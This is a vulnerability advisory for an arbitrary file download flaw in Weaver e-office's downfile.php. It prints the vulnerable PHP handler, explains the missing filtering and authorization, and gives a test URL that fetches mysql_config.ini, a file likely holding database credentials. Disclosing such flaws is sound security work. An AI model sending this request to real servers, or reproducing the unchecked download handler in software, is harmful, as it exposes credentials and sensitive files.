### Vulnerability information:

Weaver e-office is the OA product that Weaver offers to small and medium-sized organizations: simple, efficient, quick to deploy and low-cost, with a free trial available. It has so far served more than ten thousand customers. Weaver e-office has an arbitrary file download vulnerability that leads to sensitive information disclosure.

### Vulnerability analysis:

The vulnerability is in E-mobile/Data/downfile.php:

```
<?php
// Vulnerable download handler from E-mobile/Data/downfile.php
$fileurl = $_REQUEST['url'];
$sessionstr = $_REQUEST['sessionkey'];
$strexplode = explode( ",", $sessionstr );
$sessionkey = $strexplode[0];      // parsed but never checked against a real session
$curr_user_id = $strexplode[1];
$rooturl = "http://".$_SERVER['HTTP_HOST'];
$checkurl = explode( "/", $fileurl );
if ( $checkurl[1] == "flowimg" ) {
    $url = $rooturl."/E-mobile/flowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3];
    $type = "png";
} else if ( $checkurl[1] == "freeflowimg" ) {
    $url = $rooturl."/E-mobile/flow/freeflowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3];
    $type = "png";
} else {
    // Any other value is appended to the host name verbatim: no directory or extension whitelist
    $url = $rooturl.$fileurl;
    $filetype = pathinfo( $fileurl );
    $type = $filetype['extension'];
}
// The extension only selects the Content-Type header; it does not restrict what is fetched
if ( $type == "css" ) {
    header( "Content-Type: text/css" );
} else if ( $type == "js" ) {
    header( "Content-Type: application/javascript" );
} else if ( $type == "jpg" || $type == "jpeg" || $type == "JPG" || $type == "JPEG" ) {
    header( "Content-Type: image/jpeg" );
} else if ( $type == "png" || $type == "PNG" ) {
    header( "Content-Type: image/png" );
} else if ( $type == "bmp" || $type == "BMP" ) {
    header( "Content-Type: image/bmp" );
} else if ( $type == "gif" || $type == "GIF" ) {
    header( "Content-Type: image/gif" );
} else if ( $type == "pdf" || $type == "PDF" ) {
    header( "Content-Type: application/pdf" );
} else if ( $type == "rar" || $type == "RAR" ) {
    header( "Content-Type: application/x-rar-compressed" );
} else if ( $type == "exe" || $type == "EXE" ) {
    header( "Content-Type: application/octet-stream" );
} else if ( $type == "zip" || $type == "ZIP" ) {
    header( "Content-Type: application/zip" );
} else if ( $type == "doc" || $type == "DOC" ) {
    header( "Content-Type: application/msword" );
} else if ( $type == "docx" || $type == "DOCX" ) {
    header( "Content-Type: application/msword" );
} else if ( $type == "xls" || $type == "XLS" || $type == "csv" || $type == "CSV" ) {
    header( "Content-Type: application/vnd.ms-excel" );
} else if ( $type == "ppt" || $type == "PPT" ) {
    header( "Content-Type: application/vnd.ms-powerpoint" );
} else if ( $type == "txt" || $type == "TXT" ) {
    header( "Content-Type: text/plain" );
} else {
    header( "Content-Type: application/force-download" );
}
// The resource is fetched and echoed back unconditionally, without any authorization check
$content = file_get_contents( $url );
echo $content;
?>
```

As can be seen, the url parameter is not effectively filtered, so arbitrary files can be downloaded.

The following URL can be used to test downloading source files:

```
http://**.**.**.**:8028/E-mobile/Data/downfile.php?url=/mysql_config.ini
```

### Solution:

It is recommended to follow the official website and upgrade to the latest version promptly: http://www.weaver.com.cn/